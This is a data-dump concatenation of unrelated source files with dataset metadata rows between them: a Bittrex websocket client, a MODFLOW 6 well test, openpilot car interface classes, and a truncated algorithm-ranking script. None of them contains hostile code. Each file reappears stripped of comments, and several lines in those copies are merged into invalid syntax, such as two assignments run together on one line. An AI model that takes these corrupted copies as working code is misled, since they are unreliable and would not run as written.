tickers = ['BTC-ETH', 'ETH-1ST', 'BTC-1ST', 'BTC-NEO', 'ETH-NEO']
ws = MyBittrexSocket(tickers)
ws.run()
for i in list(range(10)):
sleep(1)
ws.stop()
| 22.413793
| 69
| 0.621538
|
from time import sleep
from bittrex_websocket.websocket_client import BittrexSocket
if __name__ == "__main__":
class MyBittrexSocket(BittrexSocket):
def on_open(self):
self.client_callbacks = ['updateSummaryState']
def on_debug(self, **kwargs):
pass
def on_message(self, *args, **kwargs):
print(args)
tickers = ['BTC-ETH', 'ETH-1ST', 'BTC-1ST', 'BTC-NEO', 'ETH-NEO']
ws = MyBittrexSocket(tickers)
ws.run()
for i in list(range(10)):
sleep(1)
ws.stop()
| true
| true
|
f7078e9519a8851ed45a7599f584a6bcaa1ad9db
| 7,948
|
py
|
Python
|
autotest/test_gwf_maw04.py
|
kzeiler/modflow6
|
a185d95b91985e965f8a04ae353305dff19b9637
|
[
"CC0-1.0"
] | null | null | null |
autotest/test_gwf_maw04.py
|
kzeiler/modflow6
|
a185d95b91985e965f8a04ae353305dff19b9637
|
[
"CC0-1.0"
] | null | null | null |
autotest/test_gwf_maw04.py
|
kzeiler/modflow6
|
a185d95b91985e965f8a04ae353305dff19b9637
|
[
"CC0-1.0"
] | null | null | null |
import os
import pytest
import sys
import numpy as np
try:
import pymake
except:
msg = "Error. Pymake package is not available.\n"
msg += "Try installing using the following command:\n"
msg += " pip install https://github.com/modflowpy/pymake/zipball/master"
raise Exception(msg)
try:
import flopy
except:
msg = "Error. FloPy package is not available.\n"
msg += "Try installing using the following command:\n"
msg += " pip install flopy"
raise Exception(msg)
from framework import testing_framework, running_on_CI
from simulation import Simulation
ex = [
"maw_iss305a",
"maw_iss305b",
"maw_iss305c",
"maw_iss305d",
"maw_iss305e",
"maw_iss305f",
]
exdirs = []
for s in ex:
exdirs.append(os.path.join("temp", s))
ddir = "data"
cmppth = "mf2005"
paktest = "maw"
require_failure = [True for i in range(len(exdirs))]
require_failure[0] = False
# set travis to True when version 1.13.0 is released
continuous_integration = [True for n in ex]
# set replace_exe to None to use default executable
replace_exe = None
# temporal discretization
nper = 2
perlen = [0.0, 365.0]
nstp = [1, 25]
tsmult = [1.0, 1.1]
steady = [True, False]
# spatial discretization
nlay, nrow, ncol = 2, 101, 101
shape3d = (nlay, nrow, ncol)
size3d = nlay * nrow * ncol
xlen = 1000.0
common_ratio = 1.01
nhalf = int(0.5 * ncol) + 1
first_term = 0.5 * xlen / ((1 - common_ratio**nhalf) / (1 - common_ratio))
delr = np.zeros((ncol), dtype=float)
for n in range(nhalf):
if n == 0:
v = first_term
else:
v = first_term * common_ratio**n
delr[nhalf + n - 1] = v
delr[: nhalf - 1] = delr[-1 : nhalf - 1 : -1]
# add error to edge cells
err = xlen - delr.sum()
delr[0] += 0.5 * err
delr[-1] += 0.5 * err
top = 0.0
botm = [-175, -350.0]
strt = 0.0
# hydraulic data
hk = 1.0
ss = 1e-5
confined = 0
chd_spd = []
chd5_spd = []
for i in range(nrow):
if i == 0 or i == ncol - 1:
for j in range(ncol):
chd_spd.append([(0, i, j), strt])
chd5_spd.append([0, i, j, strt, strt])
else:
chd_spd.append([(0, i, 0), strt])
chd_spd.append([(0, i, ncol - 1), strt])
chd5_spd.append([0, i, 0, strt, strt])
chd5_spd.append([0, i, ncol - 1, strt, strt])
# maw data
radius0 = np.sqrt(delr[nhalf] * delr[nhalf] / (8.0 * np.pi))
radius = 0.25
sradius0 = radius + 0.1
wellq = -100.0
skin_mult = [0.1, 10.0, 1.0, 0.0, -1.0, 100.0]
condeqn = ["CUMULATIVE", "SKIN", "SKIN", "SKIN", "SPECIFIED", "CUMULATIVE"]
sradius = [sradius0, sradius0, sradius0, sradius0, sradius0, radius0 * 1.5]
tdis_rc = []
for idx in range(nper):
tdis_rc.append((perlen[idx], nstp[idx], tsmult[idx]))
hclose, rclose = 1e-9, 1e-6
def build_model(idx, dir):
name = ex[idx]
ws = dir
# build MODFLOW 6 files
sim = flopy.mf6.MFSimulation(
sim_name=name, version="mf6", exe_name="mf6", sim_ws=ws
)
# create tdis package
tdis = flopy.mf6.ModflowTdis(
sim, time_units="DAYS", nper=nper, perioddata=tdis_rc
)
# create iterative model solution
ims = flopy.mf6.ModflowIms(
sim, inner_dvclose=hclose, rcloserecord=rclose, outer_dvclose=hclose
)
# create gwf model
gwf = flopy.mf6.ModflowGwf(sim, modelname=name, save_flows=True)
# discretization
dis = flopy.mf6.ModflowGwfdis(
gwf,
nlay=nlay,
nrow=nrow,
ncol=ncol,
delr=delr,
delc=delr,
top=top,
botm=botm,
)
# initial conditions
ic = flopy.mf6.ModflowGwfic(gwf, strt=strt)
# node property flow
npf = flopy.mf6.ModflowGwfnpf(
gwf, save_flows=False, icelltype=confined, k=hk
)
# storage
sto = flopy.mf6.ModflowGwfsto(
gwf,
save_flows=False,
iconvert=confined,
ss=ss,
steady_state={0: True},
transient={1: True},
)
# constant head
chd = flopy.mf6.ModflowGwfchd(
gwf, stress_period_data=chd_spd, save_flows=False
)
# multi-aquifer well
hks = hk * skin_mult[idx]
mpd = [[0, radius, botm[-1], strt, condeqn[idx], 2]]
mcd = [
[0, 0, (0, nhalf, nhalf), top, botm[0], hks, sradius[idx]],
[0, 1, (1, nhalf, nhalf), botm[0], botm[1], hks, sradius[idx]],
]
perioddata = {1: [[0, "RATE", wellq]]}
maw = flopy.mf6.ModflowGwfmaw(
gwf,
print_input=True,
no_well_storage=True,
packagedata=mpd,
connectiondata=mcd,
perioddata=perioddata,
)
# output control
oc = flopy.mf6.ModflowGwfoc(
gwf,
budget_filerecord="{}.cbc".format(name),
head_filerecord="{}.hds".format(name),
saverecord=[("HEAD", "ALL"), ("BUDGET", "ALL")],
)
# build MODFLOW-2005 files
if require_failure[idx]:
mc = None
else:
ws = os.path.join(dir, cmppth)
mc = flopy.modflow.Modflow(name, model_ws=ws, version=cmppth)
dis = flopy.modflow.ModflowDis(
mc,
nlay=nlay,
nrow=nrow,
ncol=ncol,
nper=nper,
perlen=perlen,
nstp=nstp,
tsmult=tsmult,
steady=steady,
delr=delr,
delc=delr,
top=top,
botm=botm,
)
bas = flopy.modflow.ModflowBas(mc, strt=strt)
lpf = flopy.modflow.ModflowLpf(
mc, laytyp=confined, hk=hk, vka=hk, ss=ss, sy=0
)
chd = flopy.modflow.ModflowChd(mc, stress_period_data=chd5_spd)
# mnw2
# empty mnw2 file to create recarrays
mnw2 = flopy.modflow.ModflowMnw2(mc)
node_data = mnw2.get_empty_node_data(2)
node_data["ztop"] = np.array([top, botm[0]])
node_data["zbotm"] = np.array([botm[0], botm[1]])
node_data["i"] = np.array([nhalf, nhalf])
node_data["j"] = np.array([nhalf, nhalf])
node_data["wellid"] = np.array(["well1", "well1"])
node_data["losstype"] = np.array(["skin", "skin"])
node_data["rw"] = np.array([radius, radius])
node_data["rskin"] = np.array([sradius[idx], sradius[idx]])
node_data["kskin"] = np.array([hks, hks])
dtype = [("wellid", np.unicode_, 20), ("qdes", "<f8")]
spd0 = np.zeros(1, dtype=dtype)
spd0["wellid"] = "well1"
spd1 = np.zeros(1, dtype=dtype)
spd1["wellid"] = "well1"
spd1["qdes"] = wellq
spd = {0: spd0, 1: spd1}
mnw2 = flopy.modflow.ModflowMnw2(
mc,
mnwmax=1,
node_data=node_data,
stress_period_data=spd,
itmp=[1, 1],
mnwprnt=2,
)
oc = flopy.modflow.ModflowOc(
mc,
stress_period_data=None,
save_every=1,
save_types=["save head", "save budget"],
)
pcg = flopy.modflow.ModflowPcg(mc, hclose=hclose, rclose=rclose)
return sim, mc
# - No need to change any code below
@pytest.mark.parametrize(
"idx, dir",
list(enumerate(exdirs)),
)
def test_mf6model(idx, dir):
# determine if running on CI infrastructure
is_CI = running_on_CI()
# initialize testing framework
test = testing_framework()
# build the models
test.build_mf6_models_legacy(build_model, idx, dir)
# run the test model
if is_CI and not continuous_integration[idx]:
return
test.run_mf6(Simulation(dir, require_failure=require_failure[idx]))
def main():
# initialize testing framework
test = testing_framework()
# build the models
# run the test model
for idx, dir in enumerate(exdirs):
test.build_mf6_models_legacy(build_model, idx, dir)
sim = Simulation(dir, require_failure=require_failure[idx])
test.run_mf6(sim)
return
if __name__ == "__main__":
# print message
print("standalone run of {}".format(os.path.basename(__file__)))
# run main routine
main()
| 26.58194
| 76
| 0.589834
|
import os
import pytest
import sys
import numpy as np
try:
import pymake
except:
msg = "Error. Pymake package is not available.\n"
msg += "Try installing using the following command:\n"
msg += " pip install https://github.com/modflowpy/pymake/zipball/master"
raise Exception(msg)
try:
import flopy
except:
msg = "Error. FloPy package is not available.\n"
msg += "Try installing using the following command:\n"
msg += " pip install flopy"
raise Exception(msg)
from framework import testing_framework, running_on_CI
from simulation import Simulation
ex = [
"maw_iss305a",
"maw_iss305b",
"maw_iss305c",
"maw_iss305d",
"maw_iss305e",
"maw_iss305f",
]
exdirs = []
for s in ex:
exdirs.append(os.path.join("temp", s))
ddir = "data"
cmppth = "mf2005"
paktest = "maw"
require_failure = [True for i in range(len(exdirs))]
require_failure[0] = False
continuous_integration = [True for n in ex]
replace_exe = None
nper = 2
perlen = [0.0, 365.0]
nstp = [1, 25]
tsmult = [1.0, 1.1]
steady = [True, False]
nlay, nrow, ncol = 2, 101, 101
shape3d = (nlay, nrow, ncol)
size3d = nlay * nrow * ncol
xlen = 1000.0
common_ratio = 1.01
nhalf = int(0.5 * ncol) + 1
first_term = 0.5 * xlen / ((1 - common_ratio**nhalf) / (1 - common_ratio))
delr = np.zeros((ncol), dtype=float)
for n in range(nhalf):
if n == 0:
v = first_term
else:
v = first_term * common_ratio**n
delr[nhalf + n - 1] = v
delr[: nhalf - 1] = delr[-1 : nhalf - 1 : -1]
err = xlen - delr.sum()
delr[0] += 0.5 * err
delr[-1] += 0.5 * err
top = 0.0
botm = [-175, -350.0]
strt = 0.0
hk = 1.0
ss = 1e-5
confined = 0
chd_spd = []
chd5_spd = []
for i in range(nrow):
if i == 0 or i == ncol - 1:
for j in range(ncol):
chd_spd.append([(0, i, j), strt])
chd5_spd.append([0, i, j, strt, strt])
else:
chd_spd.append([(0, i, 0), strt])
chd_spd.append([(0, i, ncol - 1), strt])
chd5_spd.append([0, i, 0, strt, strt])
chd5_spd.append([0, i, ncol - 1, strt, strt])
radius0 = np.sqrt(delr[nhalf] * delr[nhalf] / (8.0 * np.pi))
radius = 0.25
sradius0 = radius + 0.1
wellq = -100.0
skin_mult = [0.1, 10.0, 1.0, 0.0, -1.0, 100.0]
condeqn = ["CUMULATIVE", "SKIN", "SKIN", "SKIN", "SPECIFIED", "CUMULATIVE"]
sradius = [sradius0, sradius0, sradius0, sradius0, sradius0, radius0 * 1.5]
tdis_rc = []
for idx in range(nper):
tdis_rc.append((perlen[idx], nstp[idx], tsmult[idx]))
hclose, rclose = 1e-9, 1e-6
def build_model(idx, dir):
name = ex[idx]
ws = dir
sim = flopy.mf6.MFSimulation(
sim_name=name, version="mf6", exe_name="mf6", sim_ws=ws
)
tdis = flopy.mf6.ModflowTdis(
sim, time_units="DAYS", nper=nper, perioddata=tdis_rc
)
ims = flopy.mf6.ModflowIms(
sim, inner_dvclose=hclose, rcloserecord=rclose, outer_dvclose=hclose
)
gwf = flopy.mf6.ModflowGwf(sim, modelname=name, save_flows=True)
dis = flopy.mf6.ModflowGwfdis(
gwf,
nlay=nlay,
nrow=nrow,
ncol=ncol,
delr=delr,
delc=delr,
top=top,
botm=botm,
)
ic = flopy.mf6.ModflowGwfic(gwf, strt=strt)
npf = flopy.mf6.ModflowGwfnpf(
gwf, save_flows=False, icelltype=confined, k=hk
)
sto = flopy.mf6.ModflowGwfsto(
gwf,
save_flows=False,
iconvert=confined,
ss=ss,
steady_state={0: True},
transient={1: True},
)
chd = flopy.mf6.ModflowGwfchd(
gwf, stress_period_data=chd_spd, save_flows=False
)
hks = hk * skin_mult[idx]
mpd = [[0, radius, botm[-1], strt, condeqn[idx], 2]]
mcd = [
[0, 0, (0, nhalf, nhalf), top, botm[0], hks, sradius[idx]],
[0, 1, (1, nhalf, nhalf), botm[0], botm[1], hks, sradius[idx]],
]
perioddata = {1: [[0, "RATE", wellq]]}
maw = flopy.mf6.ModflowGwfmaw(
gwf,
print_input=True,
no_well_storage=True,
packagedata=mpd,
connectiondata=mcd,
perioddata=perioddata,
)
oc = flopy.mf6.ModflowGwfoc(
gwf,
budget_filerecord="{}.cbc".format(name),
head_filerecord="{}.hds".format(name),
saverecord=[("HEAD", "ALL"), ("BUDGET", "ALL")],
)
if require_failure[idx]:
mc = None
else:
ws = os.path.join(dir, cmppth)
mc = flopy.modflow.Modflow(name, model_ws=ws, version=cmppth)
dis = flopy.modflow.ModflowDis(
mc,
nlay=nlay,
nrow=nrow,
ncol=ncol,
nper=nper,
perlen=perlen,
nstp=nstp,
tsmult=tsmult,
steady=steady,
delr=delr,
delc=delr,
top=top,
botm=botm,
)
bas = flopy.modflow.ModflowBas(mc, strt=strt)
lpf = flopy.modflow.ModflowLpf(
mc, laytyp=confined, hk=hk, vka=hk, ss=ss, sy=0
)
chd = flopy.modflow.ModflowChd(mc, stress_period_data=chd5_spd)
mnw2 = flopy.modflow.ModflowMnw2(mc)
node_data = mnw2.get_empty_node_data(2)
node_data["ztop"] = np.array([top, botm[0]])
node_data["zbotm"] = np.array([botm[0], botm[1]])
node_data["i"] = np.array([nhalf, nhalf])
node_data["j"] = np.array([nhalf, nhalf])
node_data["wellid"] = np.array(["well1", "well1"])
node_data["losstype"] = np.array(["skin", "skin"])
node_data["rw"] = np.array([radius, radius])
node_data["rskin"] = np.array([sradius[idx], sradius[idx]])
node_data["kskin"] = np.array([hks, hks])
dtype = [("wellid", np.unicode_, 20), ("qdes", "<f8")]
spd0 = np.zeros(1, dtype=dtype)
spd0["wellid"] = "well1"
spd1 = np.zeros(1, dtype=dtype)
spd1["wellid"] = "well1"
spd1["qdes"] = wellq
spd = {0: spd0, 1: spd1}
mnw2 = flopy.modflow.ModflowMnw2(
mc,
mnwmax=1,
node_data=node_data,
stress_period_data=spd,
itmp=[1, 1],
mnwprnt=2,
)
oc = flopy.modflow.ModflowOc(
mc,
stress_period_data=None,
save_every=1,
save_types=["save head", "save budget"],
)
pcg = flopy.modflow.ModflowPcg(mc, hclose=hclose, rclose=rclose)
return sim, mc
@pytest.mark.parametrize(
"idx, dir",
list(enumerate(exdirs)),
)
def test_mf6model(idx, dir):
is_CI = running_on_CI()
test = testing_framework()
test.build_mf6_models_legacy(build_model, idx, dir)
if is_CI and not continuous_integration[idx]:
return
test.run_mf6(Simulation(dir, require_failure=require_failure[idx]))
def main():
test = testing_framework()
for idx, dir in enumerate(exdirs):
test.build_mf6_models_legacy(build_model, idx, dir)
sim = Simulation(dir, require_failure=require_failure[idx])
test.run_mf6(sim)
return
if __name__ == "__main__":
print("standalone run of {}".format(os.path.basename(__file__)))
main()
| true
| true
|
f7078ed238233ef19cc666f9050de7d121c9cc2d
| 6,652
|
py
|
Python
|
selfdrive/car/interfaces.py
|
Neptos/openpilot
|
01914a1a91ade18bd7aead99e7d1bf38cd22ad89
|
[
"MIT"
] | 5
|
2020-12-26T17:21:31.000Z
|
2021-05-11T23:09:10.000Z
|
selfdrive/car/interfaces.py
|
Neptos/openpilot
|
01914a1a91ade18bd7aead99e7d1bf38cd22ad89
|
[
"MIT"
] | 1
|
2021-02-03T00:51:55.000Z
|
2021-02-03T00:51:55.000Z
|
selfdrive/car/interfaces.py
|
Neptos/openpilot
|
01914a1a91ade18bd7aead99e7d1bf38cd22ad89
|
[
"MIT"
] | 11
|
2020-12-26T17:44:42.000Z
|
2021-04-06T19:59:25.000Z
|
import os
import time
from cereal import car
from common.kalman.simple_kalman import KF1D
from common.realtime import DT_CTRL
from selfdrive.car import gen_empty_fingerprint
from selfdrive.config import Conversions as CV
from selfdrive.controls.lib.events import Events
from selfdrive.controls.lib.vehicle_model import VehicleModel
from selfdrive.controls.lib.drive_helpers import V_CRUISE_MAX
GearShifter = car.CarState.GearShifter
EventName = car.CarEvent.EventName
MAX_CTRL_SPEED = (V_CRUISE_MAX + 4) * CV.KPH_TO_MS # 144 + 4 = 92 mph
# generic car and radar interfaces
class CarInterfaceBase():
def __init__(self, CP, CarController, CarState):
self.CP = CP
self.VM = VehicleModel(CP)
self.frame = 0
self.low_speed_alert = False
if CarState is not None:
self.CS = CarState(CP)
self.cp = self.CS.get_can_parser(CP)
self.cp_cam = self.CS.get_cam_can_parser(CP)
self.cp_body = self.CS.get_body_can_parser(CP)
self.CC = None
if CarController is not None:
self.CC = CarController(self.cp.dbc_name, CP, self.VM)
@staticmethod
def calc_accel_override(a_ego, a_target, v_ego, v_target):
return 1.
@staticmethod
def compute_gb(accel, speed):
raise NotImplementedError
@staticmethod
def get_params(candidate, fingerprint=gen_empty_fingerprint(), car_fw=None):
raise NotImplementedError
# returns a set of default params to avoid repetition in car specific params
@staticmethod
def get_std_params(candidate, fingerprint):
ret = car.CarParams.new_message()
ret.carFingerprint = candidate
ret.isPandaBlack = True # TODO: deprecate this field
# standard ALC params
ret.steerControlType = car.CarParams.SteerControlType.torque
ret.steerMaxBP = [0.]
ret.steerMaxV = [1.]
ret.minSteerSpeed = 0.
# stock ACC by default
ret.enableCruise = True
ret.minEnableSpeed = -1. # enable is done by stock ACC, so ignore this
ret.steerRatioRear = 0. # no rear steering, at least on the listed cars aboveA
ret.gasMaxBP = [0.]
ret.gasMaxV = [.5] # half max brake
ret.brakeMaxBP = [0.]
ret.brakeMaxV = [1.]
ret.openpilotLongitudinalControl = False
ret.startAccel = 0.0
ret.stoppingControl = False
ret.longitudinalTuning.deadzoneBP = [0.]
ret.longitudinalTuning.deadzoneV = [0.]
ret.longitudinalTuning.kpBP = [0.]
ret.longitudinalTuning.kpV = [1.]
ret.longitudinalTuning.kiBP = [0.]
ret.longitudinalTuning.kiV = [1.]
return ret
# returns a car.CarState, pass in car.CarControl
def update(self, c, can_strings):
raise NotImplementedError
# return sendcan, pass in a car.CarControl
def apply(self, c):
raise NotImplementedError
def create_common_events(self, cs_out, extra_gears=[], gas_resume_speed=-1, pcm_enable=True): # pylint: disable=dangerous-default-value
events = Events()
if cs_out.doorOpen:
events.add(EventName.doorOpen)
if cs_out.seatbeltUnlatched:
events.add(EventName.seatbeltNotLatched)
if cs_out.gearShifter != GearShifter.drive and cs_out.gearShifter not in extra_gears:
events.add(EventName.wrongGear)
if cs_out.gearShifter == GearShifter.reverse:
events.add(EventName.reverseGear)
if not cs_out.cruiseState.available:
events.add(EventName.wrongCarMode)
if cs_out.espDisabled:
events.add(EventName.espDisabled)
if cs_out.gasPressed:
events.add(EventName.gasPressed)
if cs_out.stockFcw:
events.add(EventName.stockFcw)
if cs_out.stockAeb:
events.add(EventName.stockAeb)
if cs_out.vEgo > MAX_CTRL_SPEED:
events.add(EventName.speedTooHigh)
if cs_out.cruiseState.nonAdaptive:
events.add(EventName.wrongCruiseMode)
if cs_out.steerError:
events.add(EventName.steerUnavailable)
elif cs_out.steerWarning:
events.add(EventName.steerTempUnavailable)
# Disable on rising edge of gas or brake. Also disable on brake when speed > 0.
# Optionally allow to press gas at zero speed to resume.
# e.g. Chrysler does not spam the resume button yet, so resuming with gas is handy. FIXME!
if (cs_out.gasPressed and (not self.CS.out.gasPressed) and cs_out.vEgo > gas_resume_speed) or \
(cs_out.brakePressed and (not self.CS.out.brakePressed or not cs_out.standstill)):
events.add(EventName.pedalPressed)
# we engage when pcm is active (rising edge)
if pcm_enable:
if cs_out.cruiseState.enabled and not self.CS.out.cruiseState.enabled:
events.add(EventName.pcmEnable)
elif not cs_out.cruiseState.enabled:
events.add(EventName.pcmDisable)
return events
class RadarInterfaceBase():
def __init__(self, CP):
self.pts = {}
self.delay = 0
self.radar_ts = CP.radarTimeStep
self.no_radar_sleep = 'NO_RADAR_SLEEP' in os.environ
def update(self, can_strings):
ret = car.RadarData.new_message()
if not self.no_radar_sleep:
time.sleep(self.radar_ts) # radard runs on RI updates
return ret
class CarStateBase:
def __init__(self, CP):
self.CP = CP
self.car_fingerprint = CP.carFingerprint
self.out = car.CarState.new_message()
self.cruise_buttons = 0
self.left_blinker_cnt = 0
self.right_blinker_cnt = 0
# Q = np.matrix([[10.0, 0.0], [0.0, 100.0]])
# R = 1e3
self.v_ego_kf = KF1D(x0=[[0.0], [0.0]],
A=[[1.0, DT_CTRL], [0.0, 1.0]],
C=[1.0, 0.0],
K=[[0.12287673], [0.29666309]])
def update_speed_kf(self, v_ego_raw):
if abs(v_ego_raw - self.v_ego_kf.x[0][0]) > 2.0: # Prevent large accelerations when car starts at non zero speed
self.v_ego_kf.x = [[v_ego_raw], [0.0]]
v_ego_x = self.v_ego_kf.update(v_ego_raw)
return float(v_ego_x[0]), float(v_ego_x[1])
def update_blinker(self, blinker_time: int, left_blinker_lamp: bool, right_blinker_lamp: bool):
self.left_blinker_cnt = blinker_time if left_blinker_lamp else max(self.left_blinker_cnt - 1, 0)
self.right_blinker_cnt = blinker_time if right_blinker_lamp else max(self.right_blinker_cnt - 1, 0)
return self.left_blinker_cnt > 0, self.right_blinker_cnt > 0
@staticmethod
def parse_gear_shifter(gear):
return {'P': GearShifter.park, 'R': GearShifter.reverse, 'N': GearShifter.neutral,
'E': GearShifter.eco, 'T': GearShifter.manumatic, 'D': GearShifter.drive,
'S': GearShifter.sport, 'L': GearShifter.low, 'B': GearShifter.brake}.get(gear, GearShifter.unknown)
@staticmethod
def get_cam_can_parser(CP):
return None
@staticmethod
def get_body_can_parser(CP):
return None
| 35.010526
| 138
| 0.704299
|
import os
import time
from cereal import car
from common.kalman.simple_kalman import KF1D
from common.realtime import DT_CTRL
from selfdrive.car import gen_empty_fingerprint
from selfdrive.config import Conversions as CV
from selfdrive.controls.lib.events import Events
from selfdrive.controls.lib.vehicle_model import VehicleModel
from selfdrive.controls.lib.drive_helpers import V_CRUISE_MAX
GearShifter = car.CarState.GearShifter
EventName = car.CarEvent.EventName
MAX_CTRL_SPEED = (V_CRUISE_MAX + 4) * CV.KPH_TO_MS
class CarInterfaceBase():
def __init__(self, CP, CarController, CarState):
self.CP = CP
self.VM = VehicleModel(CP)
self.frame = 0
self.low_speed_alert = False
if CarState is not None:
self.CS = CarState(CP)
self.cp = self.CS.get_can_parser(CP)
self.cp_cam = self.CS.get_cam_can_parser(CP)
self.cp_body = self.CS.get_body_can_parser(CP)
self.CC = None
if CarController is not None:
self.CC = CarController(self.cp.dbc_name, CP, self.VM)
@staticmethod
def calc_accel_override(a_ego, a_target, v_ego, v_target):
return 1.
@staticmethod
def compute_gb(accel, speed):
raise NotImplementedError
@staticmethod
def get_params(candidate, fingerprint=gen_empty_fingerprint(), car_fw=None):
raise NotImplementedError
@staticmethod
def get_std_params(candidate, fingerprint):
ret = car.CarParams.new_message()
ret.carFingerprint = candidate
ret.isPandaBlack = True
ret.steerControlType = car.CarParams.SteerControlType.torque
ret.steerMaxBP = [0.]
ret.steerMaxV = [1.]
ret.minSteerSpeed = 0.
ret.enableCruise = True
ret.minEnableSpeed = -1. ret.steerRatioRear = 0. ret.gasMaxBP = [0.]
ret.gasMaxV = [.5] ret.brakeMaxBP = [0.]
ret.brakeMaxV = [1.]
ret.openpilotLongitudinalControl = False
ret.startAccel = 0.0
ret.stoppingControl = False
ret.longitudinalTuning.deadzoneBP = [0.]
ret.longitudinalTuning.deadzoneV = [0.]
ret.longitudinalTuning.kpBP = [0.]
ret.longitudinalTuning.kpV = [1.]
ret.longitudinalTuning.kiBP = [0.]
ret.longitudinalTuning.kiV = [1.]
return ret
def update(self, c, can_strings):
raise NotImplementedError
def apply(self, c):
raise NotImplementedError
def create_common_events(self, cs_out, extra_gears=[], gas_resume_speed=-1, pcm_enable=True): events = Events()
if cs_out.doorOpen:
events.add(EventName.doorOpen)
if cs_out.seatbeltUnlatched:
events.add(EventName.seatbeltNotLatched)
if cs_out.gearShifter != GearShifter.drive and cs_out.gearShifter not in extra_gears:
events.add(EventName.wrongGear)
if cs_out.gearShifter == GearShifter.reverse:
events.add(EventName.reverseGear)
if not cs_out.cruiseState.available:
events.add(EventName.wrongCarMode)
if cs_out.espDisabled:
events.add(EventName.espDisabled)
if cs_out.gasPressed:
events.add(EventName.gasPressed)
if cs_out.stockFcw:
events.add(EventName.stockFcw)
if cs_out.stockAeb:
events.add(EventName.stockAeb)
if cs_out.vEgo > MAX_CTRL_SPEED:
events.add(EventName.speedTooHigh)
if cs_out.cruiseState.nonAdaptive:
events.add(EventName.wrongCruiseMode)
if cs_out.steerError:
events.add(EventName.steerUnavailable)
elif cs_out.steerWarning:
events.add(EventName.steerTempUnavailable)
if (cs_out.gasPressed and (not self.CS.out.gasPressed) and cs_out.vEgo > gas_resume_speed) or \
(cs_out.brakePressed and (not self.CS.out.brakePressed or not cs_out.standstill)):
events.add(EventName.pedalPressed)
if pcm_enable:
if cs_out.cruiseState.enabled and not self.CS.out.cruiseState.enabled:
events.add(EventName.pcmEnable)
elif not cs_out.cruiseState.enabled:
events.add(EventName.pcmDisable)
return events
class RadarInterfaceBase():
def __init__(self, CP):
self.pts = {}
self.delay = 0
self.radar_ts = CP.radarTimeStep
self.no_radar_sleep = 'NO_RADAR_SLEEP' in os.environ
def update(self, can_strings):
ret = car.RadarData.new_message()
if not self.no_radar_sleep:
time.sleep(self.radar_ts) return ret
class CarStateBase:
def __init__(self, CP):
self.CP = CP
self.car_fingerprint = CP.carFingerprint
self.out = car.CarState.new_message()
self.cruise_buttons = 0
self.left_blinker_cnt = 0
self.right_blinker_cnt = 0
self.v_ego_kf = KF1D(x0=[[0.0], [0.0]],
A=[[1.0, DT_CTRL], [0.0, 1.0]],
C=[1.0, 0.0],
K=[[0.12287673], [0.29666309]])
def update_speed_kf(self, v_ego_raw):
if abs(v_ego_raw - self.v_ego_kf.x[0][0]) > 2.0: self.v_ego_kf.x = [[v_ego_raw], [0.0]]
v_ego_x = self.v_ego_kf.update(v_ego_raw)
return float(v_ego_x[0]), float(v_ego_x[1])
def update_blinker(self, blinker_time: int, left_blinker_lamp: bool, right_blinker_lamp: bool):
self.left_blinker_cnt = blinker_time if left_blinker_lamp else max(self.left_blinker_cnt - 1, 0)
self.right_blinker_cnt = blinker_time if right_blinker_lamp else max(self.right_blinker_cnt - 1, 0)
return self.left_blinker_cnt > 0, self.right_blinker_cnt > 0
@staticmethod
def parse_gear_shifter(gear):
return {'P': GearShifter.park, 'R': GearShifter.reverse, 'N': GearShifter.neutral,
'E': GearShifter.eco, 'T': GearShifter.manumatic, 'D': GearShifter.drive,
'S': GearShifter.sport, 'L': GearShifter.low, 'B': GearShifter.brake}.get(gear, GearShifter.unknown)
@staticmethod
def get_cam_can_parser(CP):
return None
@staticmethod
def get_body_can_parser(CP):
return None
| true
| true
|
f7078ff5d6f47f04b96fa0641ac3d8233e238b90
| 1,868
|
py
|
Python
|
utils/compute_algorithm_rank.py
|
aseldawy/deep-spatial-join
|
ce0e8e08f49b05e972287c6f4f50272735e04e60
|
[
"Apache-2.0"
] | 6
|
2021-12-17T22:19:25.000Z
|
2022-03-17T23:35:04.000Z
|
utils/compute_algorithm_rank.py
|
aseldawy/deep-spatial-join
|
ce0e8e08f49b05e972287c6f4f50272735e04e60
|
[
"Apache-2.0"
] | null | null | null |
utils/compute_algorithm_rank.py
|
aseldawy/deep-spatial-join
|
ce0e8e08f49b05e972287c6f4f50272735e04e60
|
[
"Apache-2.0"
] | 2
|
2021-01-26T04:17:43.000Z
|
2021-02-16T16:10:13.000Z
|
import operator
def main():
print ('Compute algorithm rank')
f = open('../data/join_results/sj.12_30.log.csv')
output_f = open('../data/join_results/sj.12_30.log.ranked.csv', 'w')
header = f.readline()
header = header.strip()
header += ',1st time,2nd time,3rd time,4th time, 1st #splits,2nd #splits,3rd #splits,4th #splits\n'
output_f.writelines(header)
line = f.readline()
while line:
data = line.strip().split(',')
duration = {}
duration['pbsm'] = float(data[9]) if float(data[9]) > 0 else 10000
duration['dj'] = float(data[13]) if float(data[13]) > 0 else 10000
duration['repj'] = float(data[17]) if float(data[17]) > 0 else 10000
duration['bnlj'] = float(data[5]) if float(data[5]) > 0 else 10000
# print (duration)
sorted_duration = sorted(duration.items(), key=operator.itemgetter(1))
# print (sorted_duration)
line = line.strip()
for sorted_entry in sorted_duration:
print (sorted_entry[0])
line += ',{}'.format(sorted_entry[0])
split_counts = {}
split_counts['pbsm'] = float(data[8]) if float(data[8]) > 0 else 10000
split_counts['dj'] = float(data[12]) if float(data[12]) > 0 else 10000
split_counts['repj'] = float(data[16]) if float(data[16]) > 0 else 10000
split_counts['bnlj'] = float(data[4]) if float(data[4]) > 0 else 10000
print (duration)
sorted_split_counts = sorted(split_counts.items(), key=operator.itemgetter(1))
# print (sorted_duration)
for sorted_entry in sorted_split_counts:
print (sorted_entry[0])
line += ',{}'.format(sorted_entry[0])
output_f.writelines('{}\n'.format(line))
line = f.readline()
output_f.close()
f.close()
if __name__ == '__main__':
main()
| 36.627451
| 103
| 0.599036
|
import operator
def main():
print ('Compute algorithm rank')
f = open('../data/join_results/sj.12_30.log.csv')
output_f = open('../data/join_results/sj.12_30.log.ranked.csv', 'w')
header = f.readline()
header = header.strip()
header += ',1st time,2nd time,3rd time,4th time, 1st #splits,2nd #splits,3rd #splits,4th #splits\n'
output_f.writelines(header)
line = f.readline()
while line:
data = line.strip().split(',')
duration = {}
duration['pbsm'] = float(data[9]) if float(data[9]) > 0 else 10000
duration['dj'] = float(data[13]) if float(data[13]) > 0 else 10000
duration['repj'] = float(data[17]) if float(data[17]) > 0 else 10000
duration['bnlj'] = float(data[5]) if float(data[5]) > 0 else 10000
sorted_duration = sorted(duration.items(), key=operator.itemgetter(1))
line = line.strip()
